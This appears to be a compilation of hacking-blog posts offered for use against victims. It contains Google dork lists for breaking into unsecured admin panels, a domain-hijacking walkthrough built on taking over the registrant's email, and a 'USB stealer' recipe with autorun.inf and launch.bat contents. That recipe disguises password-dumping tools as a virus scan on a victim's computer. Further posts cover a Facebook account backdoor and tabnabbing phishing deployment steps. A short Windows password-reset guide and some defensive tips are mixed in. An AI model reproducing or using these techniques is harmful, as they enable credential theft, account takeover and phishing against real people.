GOOGLE DORKS TO FIND UNSECURE WEB ADMIN PANELS

These are some of the  Google Dorks which can be used to find unsecured website admin panels and break into them without using login creditials,
type any on one in google search and hit enter and have fun..

"inurl:admin/addproduct.asp"
"inurl:admin/user.asp"
"inurl:admin/addpage.php"
"inurl:admin/gallery.asp"
"inurl:admin/image.asp"
"inurl:admin/adminuser.asp"
"inurl:admin/productadd.asp"
"inurl:admin/addadmin.asp"
"inurl:admin/add_admin.asp"
"inurl:admin/add_admin.php"
"inurl:admin/addnews.asp"
"inurl:admin/addpost"
inurl"inurl:admin/addforum.???"
"inurl:admin/addgame.???"
"inurl:admin/addblog.????"
"inurl:admin/admin_detail.php"
"inurl:admin/admin_area.php"
"inurl:admin/product_add.php"
"inurl:admin/additem.php"
"inurl:admin/addstore.php"
"inurl:admin/add_Products.???"
"inurl:admin/showbook.???"
"inurl:admin/selectitem.???"
"allinurl:admin/addfile.???"
"inurl:admin/addarticle.asp"
"inurl:admin/addfile.asp"
"inurl:admin/upload.php"
"inurl:admin/upload.asp"
"inurl:admin/addstory.php"
"inurl:admin/addshow.php"
"inurl:admin/addmember.asp"
"inurl:admin/addinfo.asp"
"inurl:admin/addcat.asp"
"inurl:admin/cp.asp"
"inurl:admin/productshow.asp"
"inurl:admin/addjob.asp"
"inurl:admin/addjob.???"
"inurl:admin/addpic.???"
"inurl:admin/viewproduct.???"
"inurl:admin/addaccount.php"
"inurl:admin/manage.php"
"inurl:admin/addcontact.???"
"inurl:admin/viewmanager.???"
"inurl:admin/addschool.???"
"inurl:admin/addproject.???"
"inurl:admin/addsale.???"
"inurl:admin/addcompany.???"
"inurl:admin/payment.???"
"inurl:user/emp.???"
"inurl:admin/addmovie.???"
"inurl:admin/addpassword.???"
"inurl:admin/addemployee.???"
"inurl:admin/addcat.???"
"inurl:admin/admin.???"
"inurl:admin/admincp.???"
"inurl:admin/settings.???"
"inurl:admin/addstate.???"
"inurl:admin/addcountry.???"
"inurl:admin/addmedia.???"
"inurl:admin/addcode.???"
"inurl:admin/addlinks.???"
"inurl:admin/addcity.???"


Enjoy Hacking..!!!

Domain Hijacking

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).





The operation of domain name is as follows



Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.



1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.



2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.



For a clear understanding let me take up a small example.



John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.





What happens when a domain is hijacked



Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.



For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).



In this case the John’s domain name (abc.com) is said to be hijacked.





How the domain names are hijacked



To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients



1. The domain registrar name for the target domain.



2. The administrative email address associated with the target domain.



These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.



To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.



The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.



Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.





How to protect the domain name from being hijacked



The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

HOW TO MAKE YOUR OWN USB STEALER | STEAL PASSWORD USING PENDRIVE

We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device :D ...Sounds different but yes it is possible i found a way to perform it ...

As we all know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.

Before proceeding Download These Required Material


MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:


Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc


IE Passview: IE passview is a small program that helps us view stored passwords in Internet explorer.


Password fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

ChromePass - ChromePass is a small program used to vied stored password in Google Chrome.

Now Downloaded All the required things come to some real stuff
Mediafire password : doyouknow1247.blogspot.in


Note:Kindly disable your antivirus before performing these steps


Steps to create Own Usb Stealer1.First of all download all tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe, ChromePass.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txtStart  chromepass.exe /stext ChromePass.txt 

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the black screen window will appear.

After this you can see saved password in .TXT files

I Hope this tutorial help you in hacking remote pc stored password ..keep visiting keep learning, Keep commenting :)


Have a Good Day..!!!

Things You Should Know Before Start Learning Hacking

Hello Friends, from a past everyone is learning hacking hacking and hacking. But they just start doing it, without knowing the basic facts. Here i will share some basic things with you , which you should know before starting your tour of learning hacking.

-:TRUST:-

First there are many website available that will ask you for private info/money in return of Hacking tool or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.And after purchasing the tool you can not report even because in deep you are too purchasing sum thing illegal.

-:EMAIL HACKING SOFTWARE:- 

One thing you should know that there is no direct software on the planet that cna help you to hack Facebook , Google , Yahoo, NASA or any other big website. All the software that claim to do so are scam.Instead of wasting your money on such rubbish things , do use basci keyloggers and social engineering techniques. Once you become perfect you can hack almost any email account.

-:FREE HACKING TOOLS:-

SOme people download lots of Keyloggers or Trojans which you find as freeware on internet mostly on hacking forums and underground blogs. Hackers are not fools. They compile Keyloggers and Trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.SO don't be fool be smart.

-:CODING:-

May be there are hundreds of free tool available which are virus free and can be used for hacking but you are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made software’s and would depend on them for hacking anything then your functionality would be limited up to the functionality of the software. Here i am not saying to learn all languages but try your hands on languages like perl and python they are far much better than C and C++ , mainly concentrated on LOGIC.

-:NOTE:-

So Never Ever Under estimates the term Hacker. A Hacker Is Not a person who just hacks email id’s or deface websites but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.and he contribute his hacking skilss to help the society. 

Next time think before asking the question – "How much will I get in this field?” because, if you have so many skills, you really don’t have to run after money. Success comes and money follows itself.

Adding Facebook BACKDOOR in Hacked Account...!!!

Here is a way how some hackers retain the hacked facebook accounts even after the target changes the password or the hacker himself returns it to the target.
Many of the facebook users are unaware that there is a alternative way to log in the facebook account by linking a alternate email account to it. Not the default email id which you use regularly to log in by typing the email id and password but a different email id. So when you are logged in this alternate email id and open the facebook website it directly logs in your facebook account without even asking the password. If you did not get the concept here is a example. Imagine that your regular email id is "regular@gmail.com" and you add a alternate email id "alternate@gmail.com" in account setting. Now when you are logged in "alternate@gmail.com"
and open facebook website it redirects you and directly opens your facebook account. So here the is procedure how you can add this alternate email id as a backdoor.


For Any help Leave a comment..

Thanks..!!

Reset Administrator Password in Windows 8

 

In my previous post How to enable hidden administrator account, i have suggested you the way to enable the hidden admin account. Now in this article you will get to know, what to do if you forget your password and can’t log in to the system anymore.

So to log in to your account again, you have to enable hidden admin account using the reference from our previous post. It will be much easier to reset your password if you are using a Microsoft Administrator Account to log in. The process to get your password resetrequires you to download Offline NT Password & Registry Editor which is available as an ISO image that you can burn to CD or DVD, and a file that you can install on an USB Flash Drive.

Now boot using this CD created and after booting you will see a DOS like window. Here you are required to enter some commands that will help you to restore the user account. The steps you need to follow are:

• First screen, press enter to continue

• Select the hard drive on which your Windows installation is installed. This may take some time depending on the number of partitions on the PC as it is using the “Linux-way” of listing the hard drives.

• You then need to enter the path to the Registry. I’d recommend to tap on enter to try the default path first which usually is detected correctly by the program.

• Press q

• Select the Password Reset option (1)

• Enter Administrator as the user account that you want to modify.

• Select the unlock and enable user account option (4)

• Use ! and q to end the editing and save the values

Now restart your PC using the operating system’s drive again. After booting you will find that the administrator account is listed on the sign in page. Select it and access your computer. Now you can change other account passwords or run administrative tasks to restore access to the PC.

Download Offline NT Password & Registry Editor

How To Hack Facebook Account using TabNapping

 

Hai guys Today i will tell u How To Hack Facebook Account using TabNapping . TabNapping is an advanced way of Phising Read More about tabnabbing from HERE.



Follow these steps to Hack Facebook Account Using Tabnapping :-




1. First Download Script from HERE(password: doyouknow1247.blogspot.in) and then Extract it!!!




2. Now choose any hosting website like http://www.host1free.com/ etc.




3. Now Create your account. You will get all server details.




4. Then click on File Manager and then click on Public_Html




5. Now Upload Three Files (Facebook.html , Login.php , google.html)




6. After uploading them You will get the your files like this www.yourhosting.com/filename.html




7. Now open the tabnabb.js in note pad. Put your facebook.html your there where you will find the text like this :- window.location = ‘ Enter your Link here ‘ and then upload it




8. Now you are done when some one will open your google.html after few seconds he will be redirected to the facebook.html




9. Enjoy!!!




Thanks for Reading!!!!!

Tabnabbing: A New Type of Phishing Attack

 

Tabnabbing:

The web is a generative and wild place. Sometimes I think I missed my calling; being devious is so much fun. Too bad my parents brought me up with scruples.

Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.

What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. That’ll catch us by surprise.


How The Attack Works

1. A user navigates to your normal looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve        sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.